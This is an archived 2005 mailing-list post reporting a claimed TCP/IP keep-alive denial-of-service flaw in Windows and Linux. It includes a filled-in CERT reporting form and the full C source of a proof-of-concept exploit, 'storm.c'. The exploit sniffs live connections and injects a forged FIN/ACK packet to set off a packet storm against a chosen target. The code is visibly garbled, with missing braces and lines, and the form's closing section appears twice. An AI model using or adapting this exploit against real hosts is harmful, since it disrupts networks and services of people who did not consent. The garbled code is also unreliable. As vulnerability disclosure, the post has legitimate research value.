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Message-ID: <f87d7718050416184813f5ce06@mail.gmail.com>
Date: Sun Apr 17 02:48:52 2005
From: diego.casati at gmail.com (Diego Casati)
Subject: TCP/IP Vulnerability
To whom it may concern,
My name is Diego Casati from Brazil and Im writting to you in
respecting of what me and a friend of mine seem to believe to be a new
vulnerability in the TCP/IP stack in the Windows OS family and Linux.
I pasted bellow the e-mail that we sent to CERT reguarding this
problem. Microsft Brazil was alerted and said that "they", Im guessing
they are refering to MS Brazil, cant do anything about it. We wrote an
exploit for this vulnerability and if this is really something new it
should be a proof of concept.
Diego Casati
Inatel - National Institute of Telecomunications - www.inatel.br
Version 1.0
October 1996
CERT(R) Coordination Center
Product Vulnerability Reporting Form
If you know of a vulnerability in a product, please complete
this form and return it to cert@...t.org. We aren't able to
acknowledge each report we receive; however, if we have additional
questions, we will contact you for further information.
We prefer that any vulnerability information you
send to us be encrypted. We can support a shared DES
key or PGP. Contact the CERT staff for more information.
The CERT PGP public key is available in
Thanks, we appreciate your taking the time to report this
Let us know who you are:
Name :Diego Protta Casati
E-mail :diego.casati@...il.com
Phone / fax :55 35 3471 3749 (Brazil)
Affiliation and address: Inatel - Instituto Nacional de
Telecomunica??es - Brazil
Have you reported this to the vendor? [yes/no] NO
We encourage communication between vendors and their customers. When
we forward a report to the vendor, we include the reporter's name and
contact information unless you let us know otherwise.
If you want this report to remain anonymous, please check here:
___ Do not release my identity to your vendor contact.
If there is a CERT Vulnerability tracking number please put it
here (otherwise leave blank): VU#______.
Please describe the vulnerability.
- ----------------------------------
What is the impact of this vulnerability?
- -----------------------------------------
(For example: local user can gain root/privileged access, intruders
can create root-owned files, denial of service attack, etc.)
a) What is the specific impact: There is a failure in the TCP/IP
stack that affects a lot of the OSs today that can lead to a DoS or
DDoS. Tests were runned on an Intranet but its very likelly to happen
on the Internet. After a malformed packet during a stablished
connection (setting the wrong Acknoledge field) an overflow of "keep
alive" packages crush the systems performance and outruns the network
capacity with junk consuming up to 80% of CPU power.
b) How would you envision it being used in an attack scenario: An
attacker could use this flaw to take out a server on the Internet by
just injecting a specially crafted packet into the connection, and it
doenst seem like there's any patch for this.
To your knowledge is the vulnerability currently being exploited?
- -----------------------------------------------------------------
[yes/no] NO
If there is an exploitation script available, please include it here.
- ---------------------------------------------------------------------
/* Proof of Concept for exploiting the TCP Keep Alive implementation
* 2004/12/13
* Antonio M. D. S. Fortes - antoniofortes@...tel.br
* Diego Prota Casati - diego-casati@...tel.br
* Leandro Spinola Rodrigues - leandro-rodrigues@...tel.br
* Tested on:
* Windows 98 SE
* Windows NT Server 4.0
* Windows 2000 Professional
* Windows 2000 Server
* Windows 2003 Server
* Windows XP Professional Service Pack 1
* Windows XP Professional Service Pack 2
* Linux 2.4.x
* Linux 2.6.x:
* It wasnt tested but there is a probability that it will also work
* on it.
* Compile:
* gcc -lpcap storm.c -o storm [FreeBSD]
* gcc -D LINUX storm.c -lpcap -o storm [Linux]
* How to use:
* ./storm Device TargetHost [Count] [Filter]
* Linux systems may need to get a copy of srtlcpy and strlcat
which can be downloaded from the
* OpenBSD website (www.openbsd.org)
* Example:
* ./storm rl0 1 'dst port 80'
* where [Count] stands for how many injected packets should be sent to
* the host machine and [Filter] is the filter rules of the libpcap,
* take a look in the tcpdump man pages for some enlightments.
* Description:
* This bug appeared during a few experimentations with the TCP/IP stack
* after which we found out that it was not, at least it is not of our
* knowledge, found anywhere else before. That was actually a Solaris bug
* that resembles this one.
* After an established connection, a specially crafted packet with the
* ACK/FIN flags set, a corrected Sequency Number but with an incorrected
* Acknowledge Number will trigger a massive flush of packages with zero
* size and only the ACK flag set. Ethereal logs showed that the keep
* alive state was occuring and this flow kept going for approximately 3
* minutes and a few million packets. It was clearly observed that CPU
* and network performance was severed decreased due to this misbehave.
* Potential attacks includes DoS and DDoS. Applications and services
* that depends on quality of services (QoS) such as H323 applications
* (VoIP) and video streamming will suffer dramatic performance
* downgrade.
* Thanks to:
* Luiz Gustavo Torquato Vilela - aka "Neco" - for letting us
run few tests on his labs being such a reference
* Everson da Silva Tavares - aka "ipfix" - for doing the Linux
* Rodrigo Rubira Branco - aka "BSDaemon" - for fixing some errors
* Alex Marcio Ribeiro Nunes - aka Sefer_Zohar - for being a mentor
* Flavio Neri Rodrigues - for giving us the basics of TCP/IP
that we needed
* References:
* RFC 793 - Transmission control protocol
* RFC 1122 - Requirements for Internet Hosts - Communication Layers
#ifdef LINUX
#define _BSD_SOURCE
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <net/ethernet.h>
#ifndef LINUX
#include <net/bpf.h>
#include <bpf.h>
#include <netinet/in.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netdb.h>
#include <pcap.h>
u_short StormCount, StormPosition = 0;
in_addr_t TargetAddress;
// Packet list
u_short PacketCount = 0;
struct tcp_packet
in_addr_t Source, Destination;
u_short SourcePort, DestinationPort;
u_short Length;
uint32_t Acknowledge, Sequence;
u_short Window;
u_char Flags;
struct tcp_packet *NextPacket;
} *PacketList = NULL;
// Function Prototypes
in_addr_t ResolveHost(char *Host);
u_short TCPCheckSum(in_addr_t Source, in_addr_t Destination, struct
tcphdr *TCP);
struct tcp_packet *AddPacket(in_addr_t Source, in_addr_t Destination,
u_short SourcePort, u_short DestinationPort, struct tcp_packet
void DeletePacket(struct tcp_packet *Packet);
struct tcp_packet *FindPacket(in_addr_t Source, in_addr_t Destination,
u_short SourcePort, u_short DestinationPort);
bool SendTCP(in_addr_t Source, in_addr_t Destination, u_short
SourcePort, u_short DestinationPort, uint32_t Acknowledge, uint32_t
Sequence, u_short Window, u_short Flags);
void PCapHandler(u_char *args, const struct pcap_pkthdr *pkthdr, const
u_char *packet);
int main(int argc, void **argv)
// Length of each packet to capture
const unsigned int PACKET_CAPTURE_LENGTH = sizeof(struct
ether_header) + sizeof(struct ip) + sizeof(struct tcphdr);
char Device[16], TargetHost[128], Filter[512];
bpf_u_int32 NetAddress, NetMask;
pcap_t *Descriptor;
char CompleteFilter[1024];
struct bpf_program Program;
u_char *PCapNullArgs = NULL;
if (argc < 3)
printf("Usage: %s Device TargetHost [Count] [Filter]\n", argv[0]);
#ifndef LINUX
strlcpy(Device, argv[1], sizeof(Device));
strlcpy(TargetHost, argv[2], sizeof(TargetHost));
strncpy(Device, argv[1], sizeof(Device));
strncpy(TargetHost, argv[2], sizeof(TargetHost));
TargetAddress = ResolveHost(TargetHost);
// Getting network address and mask of the interface
if (pcap_lookupnet(Device, &NetAddress, &NetMask, PCapError) == -1)
printf("pcap_lookupnet: %s\n", PCapError);
printf("Error looking up network address and mask to
device %s\n", Device);
if (argc >= 4)
StormCount = atoi(argv[3]);
StormCount = 0;
if (argc >= 5)
#ifndef LINUX
strlcpy(Filter, argv[4], sizeof(Filter));
strncpy(Filter, argv[4], sizeof(Filter));
snprintf(Filter, sizeof(Filter), "net %s mask
%d.%d.%d.%d", inet_ntoa(*((struct in_addr *) &NetAddress)), ((u_char
*) &NetMask)[0], ((u_char *) &NetMask)[1], ((u_char *) &NetMask)[2],
((u_char *) &NetMask)[3]);
// Obtaining a descriptor to look at packets on the network
// Putting the interface in promiscuous mode
Descriptor = pcap_open_live(Device, PACKET_CAPTURE_LENGTH, true,
1, PCapError);;
if (Descriptor == NULL)
printf("pcap_open_live: %s\n", PCapError);
printf("Error obtaining a descriptor to look at packets on
the network.\n");
// Creating the filter string
snprintf(CompleteFilter, sizeof(CompleteFilter), "tcp and (%s)", Filter);
printf("Filter: %s\n", CompleteFilter);
// Compiling the filter
if (pcap_compile(Descriptor, &Program, CompleteFilter, false,
NetMask) == -1)
printf("pcap_compile: %s\n", pcap_geterr(Descriptor));
printf("Filter: %s\n", Filter);
printf("Error compiling the filter.\n");
// Set the filter to the descriptor
if (pcap_setfilter(Descriptor, &Program) == -1)
printf("pcap_setfilter: %s\n", pcap_geterr(Descriptor));
printf("Error setting the filter.\n");
// Main loop
printf("Looking for an established tcp connection with %s
...\n", TargetHost);
while (StormCount == 0 || StormPosition < StormCount)
pcap_loop(Descriptor, 1, PCapHandler, PCapNullArgs);
// The End
return 0;
// Get the address of the host
in_addr_t ResolveHost(char *Host)
in_addr_t Address = 0;
struct hostent *HostEntity;
if (strstr(".", Host) != NULL)
inet_aton(Host, (struct in_addr *) &Address);
HostEntity = gethostbyname(Host);
if (HostEntity != NULL)
memcpy(&Address, HostEntity->h_addr, sizeof(in_addr_t));
return Address;
// Calculate a TCP packet checksum
u_short TCPCheckSum(in_addr_t Source, in_addr_t Destination, struct tcphdr *TCP)
int CheckSum = 0;
ushort Length = 2 * sizeof(in_addr_t) + sizeof(struct tcphdr);
u_char *Packet = (u_char *) malloc(Length);
u_short Index = 0;
u_short *Buffer = (u_short *) Packet;
uint16_t HeaderLength = htons(sizeof(struct tcphdr));
if (Packet != NULL)
// Filling a temporary buffer to calculate the checksum
memcpy(&Packet[Index], &Source, sizeof(Source));
Index += sizeof(Source);
memcpy(&Packet[Index], &Destination, sizeof(Destination));
Index += sizeof(Destination);
memcpy(&Packet[Index], TCP, sizeof(struct tcphdr));
while (Length > 1)
CheckSum += *Buffer++;
Length -= 2;
CheckSum += ntohs(IPPROTO_TCP + sizeof(struct tcphdr));
if (Length == 1)
CheckSum += *((u_char *) Buffer);
CheckSum = (CheckSum >> 16) + (CheckSum & 0xffff);
CheckSum = (~(CheckSum + (CheckSum >> 16)) & 0xffff);
return CheckSum;
// Add a packet to the packet list
struct tcp_packet *AddPacket(in_addr_t Source, in_addr_t Destination,
u_short SourcePort, u_short DestinationPort, struct tcp_packet
if (Packet == NULL)
if (PacketCount == 0)
PacketList = (struct tcp_packet *)
malloc(sizeof(struct tcp_packet));
PacketList->NextPacket = NULL;
Packet = PacketList;
else if (PacketCount < PACKETS_MAX_COUNT)
Packet = PacketList;
while (Packet->NextPacket != NULL)
Packet = Packet->NextPacket;
Packet->NextPacket = (struct tcp_packet *)
malloc(sizeof(struct tcp_packet));
Packet = Packet->NextPacket;
Packet->NextPacket = NULL;
Packet = PacketList;
while (Packet->NextPacket != NULL)
Packet = Packet->NextPacket;
Packet->NextPacket = PacketList;
PacketList = PacketList->NextPacket;
Packet->NextPacket->NextPacket = NULL;
if (Packet != NULL)
Packet->Source = Source;
Packet->Destination = Destination;
Packet->SourcePort = SourcePort;
Packet->DestinationPort = DestinationPort;
Packet->Length = 0;
Packet->Acknowledge = 0;
Packet->Sequence = 0;
Packet->Window = 0;
Packet->Flags = 0;
return Packet;
// Delete a packet from the packet list
void DeletePacket(struct tcp_packet *Packet)
struct tcp_packet *CurrentPacket = PacketList;
if (Packet != NULL && PacketCount > 0)
// Check for the first packet of the list
if (Packet == PacketList)
PacketList = PacketList->NextPacket;
// Try to find the packet in the list
while (CurrentPacket->NextPacket != Packet &&
CurrentPacket->NextPacket != NULL)
CurrentPacket = CurrentPacket->NextPacket;
if (CurrentPacket->NextPacket != NULL)
CurrentPacket->NextPacket =
// Search a packet that matches with source and destination addresses and ports
struct tcp_packet *FindPacket(in_addr_t Source, in_addr_t Destination,
u_short SourcePort, u_short DestinationPort)
struct tcp_packet *PacketFound = NULL, *Packet = PacketList;
u_short Index;
for (Index = 0; Index < PacketCount; Index++)
if (Source == Packet->Source && Destination ==
Packet->Destination && SourcePort == Packet->SourcePort &&
DestinationPort == Packet->DestinationPort)
PacketFound = Packet;
Packet = Packet->NextPacket;
return PacketFound;
// Send a TCP packet
bool SendTCP(in_addr_t Source, in_addr_t Destination, u_short
SourcePort, u_short DestinationPort, uint32_t Acknowledge, uint32_t
Sequence, u_short Window, u_short Flags)
bool Sent = false;
int Socket;
struct sockaddr_in SocketAddress;
int On = 1;
char Packet[sizeof(struct ip) + sizeof(struct tcphdr)];
struct ip *IP = (struct ip *) &Packet[0];
struct tcphdr *TCP = (struct tcphdr *) &Packet[sizeof(struct ip)];
// Try to create a raw socket
Socket = socket(AF_INET, SOCK_RAW, IPPROTO_IP);
if (Socket < 0)
return false;
// Configure the socket
if(setsockopt(Socket, IPPROTO_IP, IP_HDRINCL, (char *) &On,
sizeof(On)) < 0)
return false;
// Configure the socket address
memset(&SocketAddress, 0, sizeof(SocketAddress));
#ifndef LINUX
SocketAddress.sin_len = sizeof(Packet);
SocketAddress.sin_family = AF_INET;
SocketAddress.sin_port = DestinationPort;
SocketAddress.sin_addr.s_addr = Destination;
// Fill the packet
memset(Packet, 0, sizeof(Packet));
IP->ip_hl = sizeof(struct ip) >> 2;
IP->ip_v = 4;
IP->ip_len = sizeof(Packet);
IP->ip_ttl = 64;
IP->ip_src.s_addr = Source;
IP->ip_dst.s_addr = Destination;
TCP->th_sport = SourcePort;
TCP->th_dport = DestinationPort;
TCP->th_ack = Acknowledge;
TCP->th_seq = Sequence;
TCP->th_off = sizeof(struct tcphdr) >> 2;
TCP->th_off = TCP->th_off << 4;
TCP->th_flags = Flags;
TCP->th_win = Window;
TCP->th_sum = TCPCheckSum(Source, Destination, TCP);
// Try to send the packet
Sent = sendto(Socket, Packet, sizeof(Packet), 0, (const struct
sockaddr *) &SocketAddress, sizeof(SocketAddress)) == sizeof(Packet);
if (!Sent)
printf("Error sending packet to %s ...\n",
inet_ntoa(*((struct in_addr *) &Destination)));
return Sent;
// Packet Capture handler
void PCapHandler(u_char *args, const struct pcap_pkthdr *pkthdr, const
u_char *packet)
struct ip *IP = (struct ip *) &packet[sizeof(struct ether_header)];
struct tcphdr *TCP = (struct tcpheader *) &packet[sizeof(struct
ether_header) + sizeof(struct ip)];
char Source[16], Destination[16];
u_short Length;
struct tcp_packet *Packet, *PreviousPacket, *TargetPacket, *ReturnPacket;
bool DeletePackets = false, KeepAlive = false, StormSent = false;
char PacketType[32];
#ifndef LINUX
strlcpy(PacketType, ". . . . . .", sizeof(PacketType));
// Getting the Source and Destination ASCII strings
strlcpy(Source, (char *) inet_ntoa(IP->ip_src), sizeof(Source));
strlcpy(Destination, (char *) inet_ntoa(IP->ip_dst), sizeof(Destination));
strncpy(PacketType, ". . . . . .", sizeof(PacketType));
// Getting the Source and Destination ASCII strings
strncpy(Source, (char *) inet_ntoa(IP->ip_src), sizeof(Source));
strncpy(Destination, (char *) inet_ntoa(IP->ip_dst), sizeof(Destination));
// Length of the TCP data
Length = pkthdr->len - sizeof(struct ether_header) -
sizeof(struct ip) - (TCP->th_off << 2);
// Search for a packet in the list, with the same source, destination,
// source port and destination port of the packet received
Packet = FindPacket(IP->ip_src.s_addr, IP->ip_dst.s_addr,
TCP->th_sport, TCP->th_dport);
PreviousPacket = FindPacket(IP->ip_dst.s_addr,
IP->ip_src.s_addr, TCP->th_dport, TCP->th_sport);
// Check for flags in an established connection
if ((TCP->th_flags & TH_ACK) && !(TCP->th_flags & (TH_FIN | TH_RST)))
// Add the packet to the list
Packet = AddPacket(IP->ip_src.s_addr, IP->ip_dst.s_addr,
TCP->th_sport, TCP->th_dport, Packet);
// Fill important data in the packet added
// The TCP header size includes the size of the TCP options
Packet->Length = Length;
Packet->Acknowledge = TCP->th_ack;
Packet->Sequence = TCP->th_seq;
Packet->Window = TCP->th_win;
Packet->Flags = TCP->th_flags;
if (PreviousPacket != NULL)
// Check if the packet is a keep alive one
KeepAlive = (Packet->Flags == TH_ACK) &&
(Packet->Length == 0) && (PreviousPacket->Flags == TH_ACK) &&
(PreviousPacket->Length == 0);
// Check target address again (Possible invalid filter)
if (!KeepAlive && (Packet->Destination ==
TargetAddress || PreviousPacket->Destination == TargetAddress))
// Established connection detected
#ifndef LINUX
strlcpy(PacketType, "Established", sizeof(PacketType));
strncpy(PacketType, "Established", sizeof(PacketType));
// Point TargetPacket to the packet that has
// destination matching with target address,
// and ReturnPacket to the other
if (Packet->Destination == TargetAddress)
TargetPacket = Packet;
ReturnPacket = PreviousPacket;
TargetPacket = PreviousPacket;
ReturnPacket = Packet;
// Send the malicious TCP packet to start the
// storm;
// The Acknowledge Number is guaranteed to
// be less or equal to the expected Acknowledge
// Number minus 1 (This is what we want! ;) )
StormSent = SendTCP(TargetPacket->Source,
TargetPacket->Destination, TargetPacket->SourcePort,
TargetPacket->DestinationPort, htonl(ntohl(TargetPacket->Acknowledge)
- 1), htonl(ntohl(ReturnPacket->Acknowledge) + (TargetPacket->Flags &
TH_SYN) / TH_SYN), TargetPacket->Window, TH_FIN | TH_ACK);
DeletePackets = true;
#ifndef LINUX
strlcpy(PacketType, "Closed.....", sizeof(PacketType));
strncpy(PacketType, "Closed.....", sizeof(PacketType));
// Print some information of the packet received
if (!KeepAlive)
printf("%s: [Length: %d] %s.%d %s.%d\n", PacketType,
Length, Source, ntohs(TCP->th_sport), Destination,
if (StormSent)
printf("** STORM **: [Packet %d] Sent to %s.%d\n",
StormPosition, inet_ntoa(*((struct in_addr *)
&TargetPacket->Destination)), ntohs(TargetPacket->DestinationPort));
if (DeletePackets)
// Delete this packet (if it is in the list) and a possible
// previous packet, in the oposite way
Do you know what systems and/or configurations are vulnerable?
- --------------------------------------------------------------
[yes/no] YES (If yes, please list them below)
System : Windows 9.x, NT, 2k, XP (Including SP2), 2003
and Linux 2.4 and 2.6
OS version :
Are you aware of any workarounds and/or fixes for this vulnerability?
- ---------------------------------------------------------------------
[yes/no] (If you have a workaround or are aware of patches
please include the information here.)
We dont know any workaround but we are trying to work on one.
Is there anything else you would like to tell us?
- --------
CERT and CERT Coordination Center are registered in the U.S. Patent
and Trademark office.
Version: GnuPG v1.2.1 (GNU/Linux)
Do you know what systems and/or configurations are vulnerable?
- --------------------------------------------------------------
[yes/no] YES (If yes, please list them below)
System : Windows 9.x, NT, 2k, XP (Including SP2), 2003
and Linux 2.4 and 2.6
OS version :
Are you aware of any workarounds and/or fixes for this vulnerability?
- ---------------------------------------------------------------------
[yes/no] (If you have a workaround or are aware of patches
please include the information here.)
We dont know any workaround but we are trying to work on one.
Is there anything else you would like to tell us?
- --------
CERT and CERT Coordination Center are registered in the U.S. Patent
and Trademark office.
Version: GnuPG v1.2.1 (GNU/Linux)
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